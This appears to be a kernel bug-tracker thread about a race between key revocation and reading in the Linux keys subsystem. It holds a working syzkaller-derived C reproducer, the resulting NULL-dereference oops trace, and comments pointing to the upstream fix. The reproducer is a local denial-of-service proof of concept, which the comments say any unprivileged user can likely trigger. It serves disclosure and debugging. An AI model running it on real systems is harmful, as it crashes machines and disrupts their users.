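On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9). The following program causes GPF in keyctl:

// autogenerated by syzkaller (http://github.com/google/syzkaller), cleaned up.
//
// Reproducer for a race in the keys subsystem: two threads revoke a "user"-type
// key (KEYCTL_REVOKE) while two others read its payload (KEYCTL_READ). The oops
// below shows the reader, user_read() in security/keys/user_defined.c, taking a
// NULL pointer dereference at offset 0x10 while a concurrent revoke is in flight.
// None of the calls used here appear to need any privilege (own session keyring,
// own key), so presumably any local user can trigger the oops -- confirm.
//
// Compared with the raw syzkaller output: the MAP_FIXED scratch mapping at
// 0x20000000 (which would silently replace whatever was already mapped there)
// is gone in favour of ordinary buffers, the unused r0/r5/r6 locals are dropped,
// the thread array is sized to the number of threads actually started, and
// add_key()/pthread_create() failures are reported instead of being ignored --
// with an invalid key id the threads would not exercise the race at all.
#define _GNU_SOURCE
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* keyctl(2) operations and the special keyring id used below. The values are
 * the ones from <linux/keyctl.h> / <keyutils.h>, spelled out so that no
 * non-standard header is needed to build the reproducer. */
enum {
	KEYCTL_OP_REVOKE = 3,
	KEYCTL_OP_READ = 11,
	NUM_THREADS = 4,
};
#define KEY_SPEC_SESSION_KEYRING_ID (-4L)

/* Payload of the "user" key, taken verbatim from the syzkaller program. The
 * bytes themselves do not seem to matter for the race; any blob would do. */
static const char key_payload[] =
	"\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad"
	"\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d"
	"\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1"
	"\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a"
	"\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d"
	"\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5"
	"\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87"
	"\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b"
	"\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e";
#define KEY_PAYLOAD_LEN (sizeof key_payload - 1) /* 0x89 bytes, excluding the NUL */

/* Destination for KEYCTL_READ; the original passed a 0x1000-byte window. */
static char read_buf[0x1000];

/* Id of the key every thread operates on. Written once by main() before any
 * thread is created, read-only afterwards, so no synchronisation is needed. */
static long key_id;

/* Revoker side of the race: KEYCTL_REVOKE on the shared key. The return value
 * is deliberately ignored -- all that matters is that the revoke overlaps with
 * a read in another thread. */
static void *revoke_thread(void *arg)
{
	(void)arg;
	syscall(SYS_keyctl, KEYCTL_OP_REVOKE, key_id, 0, 0, 0);
	return NULL;
}

/* Reader side of the race: KEYCTL_READ of the key payload into read_buf. The
 * kernel side of this call (user_read) is where the oops is reported. */
static void *read_thread(void *arg)
{
	(void)arg;
	syscall(SYS_keyctl, KEYCTL_OP_READ, key_id, read_buf, sizeof read_buf, 0);
	return NULL;
}

/* Creates the key, then starts two revokers and two readers and waits for them.
 * Returns EXIT_FAILURE if the key or a thread could not be created. */
int main(void)
{
	/* Same interleaving as the syzkaller program: revoke, read, revoke, read. */
	void *(*const bodies[NUM_THREADS])(void *) = {
		revoke_thread, read_thread, revoke_thread, read_thread,
	};
	pthread_t threads[NUM_THREADS];

	/* A "user" key described "%" in the caller's session keyring. */
	key_id = syscall(SYS_add_key, "user", "%", key_payload, KEY_PAYLOAD_LEN,
			 KEY_SPEC_SESSION_KEYRING_ID);
	if (key_id < 0) {
		perror("add_key");
		return EXIT_FAILURE;
	}

	for (int i = 0; i < NUM_THREADS; i++) {
		int err = pthread_create(&threads[i], NULL, bodies[i], NULL);
		if (err != 0) {
			fprintf(stderr, "pthread_create: %s\n", strerror(err));
			return EXIT_FAILURE;
		}
	}
	for (int i = 0; i < NUM_THREADS; i++)
		pthread_join(threads[i], NULL);

	return EXIT_SUCCESS;
}

BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
PGD 35b9b067 PUD 34c71067 PMD 0
Oops: 0000 [#1] SMP
Modules linked in:
CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: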
ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000
RIP: 0010:[<ffffffff816870b7>] [<ffffffff816870b7>] user_read+0x37/0xb0
RSP: 0018:ffff8800364f3ee0 EFLAGS: 00010206
RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001
RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000
RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001
R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000
R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000
FS: 00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0
Stack:
 ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000
 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000
 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48
Call Trace:
 [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761
 [< inline >] SYSC_keyctl security/keys/keyctl.c:1595
 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553
 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185
Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48
RIP [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196
 RSP <ffff8800364f3ee0>
CR2: 0000000000000010
---[ end trace acbace9643063ebd ]---
Created attachment 1104416 [details] — Simplified testcase. Here's a cleaned-up version of the testcase.
Compile the cleaned up testcase with: make keyctl-gpf LDLIBS="-lpthread -lkeyutils"
Created attachment 1104753 [details] Patch to fix race between read and revoke
(In reply to David Howells from comment #3)
> Created attachment 1104753 [details]
> Patch to fix race between read and revoke

This probably needs the "Cc: stable@vger.kernel.org" tag in the commit log when you send it upstream, so that the fix is also picked up by the stable kernels.
This went upstream as commit b4a1b4f5047e4f54e194681125c74c0aa64d637d